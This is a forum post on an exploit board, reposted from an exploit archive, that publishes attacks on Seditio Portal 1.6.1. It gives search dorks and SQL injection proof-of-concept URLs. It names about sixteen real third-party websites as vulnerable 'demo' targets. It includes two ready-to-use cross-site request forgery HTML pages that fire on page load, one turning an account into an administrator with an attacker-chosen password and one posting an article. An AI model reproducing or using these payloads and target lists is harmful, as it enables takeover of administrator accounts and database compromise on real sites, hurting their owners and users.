.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

.:: Blackc0de Forum ::. :: Information Technology :: Exploits
 

 Seditio Portal Multiple Vulnerabilities(CSRF Add admin + add new article /Sql InjecTion)

Go down 
PengirimMessage
robofics
VIP Member
VIP Member
robofics


Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null

Seditio Portal Multiple Vulnerabilities(CSRF Add admin + add new article /Sql InjecTion) Empty
PostSubyek: Seditio Portal Multiple Vulnerabilities(CSRF Add admin + add new article /Sql InjecTion)   Seditio Portal Multiple Vulnerabilities(CSRF Add admin + add new article /Sql InjecTion) Icon_minitimeTue Apr 03, 2012 9:39 am
Code:
+---------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title      :  Seditio Portal Multiple Vulnerabilities(CSRF Add admin + add new article /Sql InjecTion)
# Date                :  03-april-2012
# Author            :  khaled-Ham
# Software link    :  http://www.neocrome.net/files/code/seditio-build161.rar
# Version            :  1.6.1
# Category          :  WebApps
# Tested on        :  Windows 7/xp/Ubuntu 10.10
# Thanks            :  http://1337day.com all Inj3ct0r Member & http://exploit-db.com
+---------------------------------------------------------------------------------------------------------------------------------------+
1) First File Sql Vuln : 
  /portal/list.php
  D0rk :  inurl:"/list.php?c="
 
  P0C :
 
  http://127.0.0.1/<PATH>/list.php?c=news&o=&p=&s=title&w= <- add any number  : xD
  http://127.0.0.1/<PATH>/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ]
 
 

2) Secnd File Sql Vuln :
  /portal/forums.php
  D0rk : inurl:"/forums.php?m="

  P0C :
 
  http://127.0.0.1/<PATH>/forums.php?m=topics&o=viewcount&s=2&w= <- add any number : xD
  http://127.0.0.1/<PATH>/forums.php?m=topics&o=viewcount&s=2&w=1 < <:- [ SQL ]

 
3) Site Demo :

  http://www.armaholic.com/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ]
  http://www.airlinercafe.com/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ]
  http://flashtro.com/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ]
  http://www.airfighters.com/forums.php?m=topics&o=viewcount&s=2&w=1 <:- [ SQL ]
  http://www.clubbersguide.com.mk/forums.php?m=topics&o=viewcount&s=2&w=1  <:- [ SQL ]
  http://tgt.vstanced.com/forums.php?m=topics&o=viewcount&s=2&w=1  <:- [ SQL ]
  http://flashtro.com/forums.php?m=topics&o=viewcount&s=2&w=1 <:- [ SQL ]
  http://wearemassillon.com/forums.php?m=topics&o=viewcount&s=2&w=1 <:- [ SQL ]
  http://www.bellspalsy.net/forums.php?m=topics&o=viewcount&s=2&w=1  <:- [ SQL ]
  http://www.pspdemocenter.com/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ]
  http://www.livid.me.uk/list.php?c=news&o=&p=&s=title&w=1  <:- [ SQL ]
  http://www.saripkro.ru/list.php?c=news&o=&p=&s=title&w=1  <:- [ SQL ]
  http://www.artscroll.ru/list.php?c=news&o=&p=&s=title&w=1  <:- [ SQL ]
  http://www.pure-graphics.org/list.php?c=news&o=&p=&s=title&w=1  <:- [ SQL ]
  http://subs.com.ru/list.php?c=news&o=&p=&s=title&w=1  <:- [ SQL ]
  http://riddleofsteel.net/list.php?c=news&o=&p=&s=title&w=1  <:- [ SQL ]

4) CSRF Add Admin (Edit user ) :

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title> CSRF Add Admin (edit admin) By : Khaled-ham </title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "60","60","420","690","410","430","570","2340" );
function pausecomp(millis)
{
var date = new Date();
var curDate = null;
do { curDate = new Date(); }while(curDate-date < millis);}function fireForms()
{var count = 8;var i=0;for(i=0; i<count; i++){document.forms[i].submit();pausecomp(pauses[i]);}}
 </script>
<H2>CSRF Add Admin (edit admin) By : Khaled-ham</H2>
<form method="POST" name="form0" action="http://<CHANGE IT >/<PATH>/users.php?m=edit&a=update&x=12758D&id=14">
<input type="hidden" name="id" value="14"/>
<input type="hidden" name="rusername" value="khaled-ham"/>    <---------- Change it , put your new Usrename
<input type="hidden" name="rusermaingrp" value="5"/>
<input type="hidden" name="rusergroupsms[5]" value="on"/>
<input type="hidden" name="rusercountry" value="00"/>
<input type="hidden" name="ruserlocation" value=""/>
<input type="hidden" name="rusertimezone" value="0"/>
<input type="hidden" name="ruserskin" value="artic"/>
<input type="hidden" name="ruserlang" value="en"/>
<input type="hidden" name="ruseravatar" value=""/>
<input type="hidden" name="rusersignature" value=""/>
<input type="hidden" name="rusernewpass" value=" Your Pass "/>      <---------- Change it , put your new password
<input type="hidden" name="ruseremail" value="acunetix_wvs_invalid_filename"/>
<input type="hidden" name="ruserhideemail" value="1"/>
<input type="hidden" name="ruserpmnotify" value="1"/>
<input type="hidden" name="ruserwebsite" value=""/>
<input type="hidden" name="ryear" value="0"/>
<input type="hidden" name="rmonth" value="0"/>
<input type="hidden" name="rday" value="0"/>
<input type="hidden" name="ruseroccupation" value=""/>
<input type="hidden" name="rusergender" value="U"/>
<input type="hidden" name="rusertext" value=""/>
<input type="hidden" name="ruserdelete" value="0"/>
<input type="hidden" name="x" value="12758D"/>
</form>
</body>
</html>


5) CSRF Add Article :

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title> CSRF Add Article By : khaled-ham </title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "30","40","560","630","400","1020","3400","670" );
function pausecomp(millis)
{var date = new Date();var curDate = null;
do { curDate = new Date(); }
while(curDate-date < millis);}function fireForms()
{var count = 8;
var i=0;for(i=0; i<count; i++){document.forms[i].submit();pausecomp(pauses[i]);}}
    </script>
<H2> CSRF Add Article By : khaled-ham </H2>
<form method="POST" name="form0" action="http://CHANGE IT/<PATH>/page.php?m=add&a=add">
<input type="hidden" name="newpagecat" value="articles"/>
<input type="hidden" name="newpagetitle" value="Hack Test2"/>  <------ Edit title
<input type="hidden" name="newpagedesc" value="Hack Test2"/>  <- ------Edit
<input type="hidden" name="newpageauthor" value="khaled-ham2"/> < ---------Edit
<input type="hidden" name="newpagekey" value=""/>
<input type="hidden" name="newpagealias" value=""/>
<input type="hidden" name="ryear_beg" value="2012"/>
<input type="hidden" name="rmonth_beg" value="4"/>
<input type="hidden" name="rday_beg" value="2"/>
<input type="hidden" name="rhour_beg" value="13"/>
<input type="hidden" name="rminute_beg" value="15"/>
<input type="hidden" name="ryear_exp" value="2028"/>
<input type="hidden" name="rmonth_exp" value="12"/>
<input type="hidden" name="rday_exp" value="31"/>
<input type="hidden" name="rhour_exp" value="15"/>
<input type="hidden" name="rminute_exp" value="0"/>
<input type="hidden" name="newpagetext" value="Hiiiiiiiiiiii"/>
<input type="hidden" name="newpagefile" value="0"/>
<input type="hidden" name="newpageurl" value=""/>
<input type="hidden" name="newpagesize" value=""/>
<input type="hidden" name="x" value="12758D"/>
</form>
</body>
</html>

+----------------[!Expl01t3d By : Expl0!Ts !]-------------------------+
# Greets T0 : robert miles & Yasser X-man & Waille allane ..
# sec4ever.com & Dz4all.com & v4-team.com ....
+------------------------------------------------------------------------+
./The EnD


# 1337day.com [2012-04-02]
Kembali Ke Atas Go down
http://robofics.wordpress.com
 
Seditio Portal Multiple Vulnerabilities(CSRF Add admin + add new article /Sql InjecTion)
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» VietNext CMS Multiple Vulnerabilities
» VietNext CMS Multiple Vulnerabilities
» OpenCart 1.5.2.1 Multiple Vulnerabilities
» Clip Bucket 2.6 Multiple Vulnerabilities
» Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: